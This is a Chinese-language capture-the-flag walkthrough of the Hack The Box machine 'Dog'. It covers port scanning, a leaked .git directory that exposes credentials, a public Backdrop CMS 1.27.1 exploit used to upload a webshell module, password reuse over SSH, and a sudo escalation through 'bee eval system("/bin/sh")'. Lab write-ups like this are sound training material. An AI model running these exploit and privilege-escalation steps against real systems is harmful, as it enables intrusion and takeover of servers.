信息搜集
1、端口扫描
nmap -A -v -T4 10.10.11.58
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))| http-robots.txt: 22 disallowed entries (15 shown)| /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register |_/user/password /user/login /user/logout /?q=admin /?q=comment/reply|_http-generator: Backdrop CMS 1 (https://backdropcms.org)| http-methods: |_ Supported Methods: GET HEAD POST OPTIONS| http-git: | 10.10.11.58:80/.git/| Git repository found!| Repository description: Unnamed repository; edit this file 'description' to name the...|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510|_http-title: Home | Dog|_http-server-header: Apache/2.4.41 (Ubuntu)
80端口 -> .git泄露、robots.txt文件、Backdrop CMS
GitHack脱下来的git目录:settings.php$database = 'mysql://root:[email protected]/backdrop';$settings['hash_salt'] = 'aWFvPQNGZSz1DQ701dD4lC5v1hQW34NefHvyZUzlThQ';"update_emails": ["[email protected]" ],define('BACKDROP_VERSION', '1.27.1');
.git里面泄露的信息有一个密码,BackDrop的版本(1.27.1)还有用户tiffany
打点
登录框 ---
.git
泄露
[email protected] / BackDropJ2024DS2024
Backdrop 1.27.1
searchsploit backdrop 1.27.1searchsploit -m php/webapps/52021.py
运行
POC
- 手动复现 - 排错
python 52021.py http://dog.htb# 访问给的地址发现 -> 不存在 -> 那就手动去弄一下 http://dog.htb/admin/modules/install# 但是访问这个 http://dog.htb/admin/modules/install -> 依然不存在# 上传点 -> 手动寻找
找到上传点,发现实际情况下无法上传zip -> 只支持 tar tgz gz bz2将zip文件重新打包成以上中的格式
这里好像还有点说法 -> 直接用 tar -zvcf 命令生成最好tar -zcvf shell.tar.gz ./shellshell目录来源于 -> 运行POC生成的 -> shell.zip解压出来的
tar -zcvf shell.tar.gz ./shell
-
-z
:使用gzip
格式归档 -
-c
:创建新的归档 -
-v
:显示归档过程 -
-f
:指定归档文件名
Getshell
webshell & ssh
寻找用户 -> 尝试ssh登录johncusack:BackDropJ2024DS2024
得到user.txt
提权
sudo -l
根据bee的帮助文档sudo bee --root=/var/www/html eval'system("/bin/sh")'
总结
.git泄露robots.txt文件泄露敏感信息 -> 账号密码 -> CMS版本 -> 因为是CMS & 泄露账号密码 -> 登录后台 -> 寻找CMS漏洞 -> 得到POC -> 复现RCE -> 得到shell -> sudo提权
原文始发于微信公众号(夜风Sec):HTB靶机 - dog记录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论